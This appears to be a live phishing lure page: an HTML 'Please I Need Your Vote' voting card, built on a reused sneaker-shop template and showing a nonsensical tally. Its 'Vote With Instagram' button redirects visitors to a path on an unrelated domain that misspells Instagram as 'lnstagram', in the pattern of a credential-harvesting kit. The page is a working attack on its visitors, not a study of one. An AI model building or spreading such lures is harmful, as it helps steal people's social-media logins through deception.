<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
     <style type="text/css">
         @import url("https://fonts.googleapis.com/css2?family=Reggae+One&family=Source+Sans+Pro&family=Oleo+Script&family=Dela+Gothic+One&family=Atma&display=swap");

/* ----- RESET ----- */
* {
    padding: 0;
    margin: 0;
    box-sizing: border-box;
}

body {
    font-size: 16px;
    background-color: #e2efff;
    display: flex;
    flex-direction: column;
    align-items: center;
    text-align: center;
    j
}

body,
select,
option,
button {
    font-family: "Source Sans Pro", sans-serif;
}

header {
    background-color: #1a1a1c;
    text-shadow: 0 -1px #0a0a0a;
    width: 100%;
    padding: 1.8rem 2.2rem;
    display: grid;
    justify-content: start;
    align-items: center;
}

#brand-name {
    color: #ededed;
    font-family: "Reggae One", cursive;
    flex-shrink: 1;
}

.tagline {
    color: #b3b3b3;
    font-family: "Oleo Script", cursive;
    flex-shrink: 1;
}

header svg {
    fill: #ededed;
    width: 3.2rem;
    margin-left: 1.4rem;
    grid-row: 1 / span 2;
    grid-column: 2 / span 1;
}

h2,
.category-description {
    background-image: linear-gradient(90deg, #f2bc18, #fffc2e);
    width: calc(100% - calc(2.2rem * 2));
    max-width: 640px;
    padding: 2.8rem;
    transform: translateY(2.2rem);
}

h2 {
    color: rgba(0, 0, 0, 0.8);
    font-family: "Dela Gothic One", cursive;
    font-size: 2rem;
    padding-bottom: 1.5rem;
    margin-bottom: 0;
    border-radius: 2.7rem 2.7rem 0 0;
}

.category-description {
    color: rgba(0, 0, 0, 0.45);
    font-family: "Atma", cursive;
    font-size: 1.25rem;
    padding-top: 0;
    padding-bottom: 6.5rem;
    margin-top: 0;
    border-radius: 0 0 2.7rem 2.7rem;
}

h2 {
     text-align: center;
}
.item {
    background-color: rgba(255, 255, 255, 0.5);
    width: calc(100% - calc(2.8rem * 2));
    max-width: 440px;
    padding: 2.8rem;
    margin-bottom: 2.2rem;
    display: flex;
    flex-direction: column;
    border-radius: 1.7rem;
    box-shadow: 0 1.5rem 3rem rgba(0, 0, 0, 0.2);
    transform: translateY(-1rem);
    backdrop-filter: blur(1.5rem);
}

.item:last-child {
    margin-bottom: 0.5rem;
}

.item h3 {
    font-size: 1.75rem;
    font-weight: bold;
    height: 2.8rem;
    margin-bottom: 0.5rem;
}

.item figure {
    width: 100%;
    margin-bottom: 1.5rem;
    display: flex;
    justify-content: center;
    align-items: center;
    overflow: hidden;
    border-radius: 1.5rem;
}

.item figure img {
    height: 320px;
    display: block;
}

.description {
    color: rgba(255, 255, 255, 0.7);
    background-color: rgba(0, 0, 0, 0.5);
    width: calc(100% - calc(2.8rem * 2));
    height: 320px;
    line-height: 1.75rem;
    padding: 2.5rem;
    position: absolute;
    top: calc(2.8rem + 3.3rem);
    left: 2.8rem;
    overflow: auto;
    opacity: 0;
    border-radius: 1.5rem;
    transition: opacity 200ms ease-out;
}

.item figure:hover + .description,
.description:hover {
    opacity: 1;
}

.item button {
    color: white;
    background-color: green;
    font-size: 0.8rem;
    font-weight: bold;
    text-shadow: 0 -1px #ffc233;
    padding: 0.4rem;
    outline: none;
    transition: filter 500ms ease-out;
    text-align: center;
    
}

.item button:hover {
    filter: brightness(90%);
}

.item button:active {
    filter: brightness(80%);
}

.price {
    font-size: 1.4rem;
    font-weight: bold;
    margin-bottom: 1.5rem;
}

.special {
    margin-bottom: 0.5rem;
}

select {
    padding: 0.8rem 1.2rem;
    border: solid 1px #efefef;
    margin-bottom: 1.2rem;
    outline: none;
    border-radius: 0.75rem;
    transition: box-shadow 200ms ease-out;
}

select:focus,
select:active {
    box-shadow: 0 0 0 0.25rem rgba(43, 153, 255, 0.5);
}

label {
    margin-bottom: 0.7rem;
}

     </style>
  
  </head>
  <body>
<br>
<br>
<br>
<br>
<br>
<br>
<div class="item">
    <h4>Please I Need Your Vote</h4>
    <br>
    <figure>
        <img src="maksim-larin-jZyacqaR4iI-unsplash1.jpg" alt="a pair of blue and red ASICS sneakers">
    </figure>
    
    <p class="price">Oscar James</p>
    <button onclick="window.location.href = 'http://reedmusicawards.nl/uplink/insta/finalis/lnstagram/Voting/instagram/index.php';">Vote With Instagram</button>
    <a class="btn btn-danger">Vote </a>
<br>
     <ul class="list-group list-group-flush" style="text-align: left;">
    <li class="list-group-item bg-info">Total Votes: 5648 out of 5600</li>
    <li class="list-group-item">Total Votes To Win: -48</li>
    <li class="list-group-item">Help</li>
  </ul>
    
    
</div>

 <!-- Option 1: Bootstrap Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
        </body>
</html>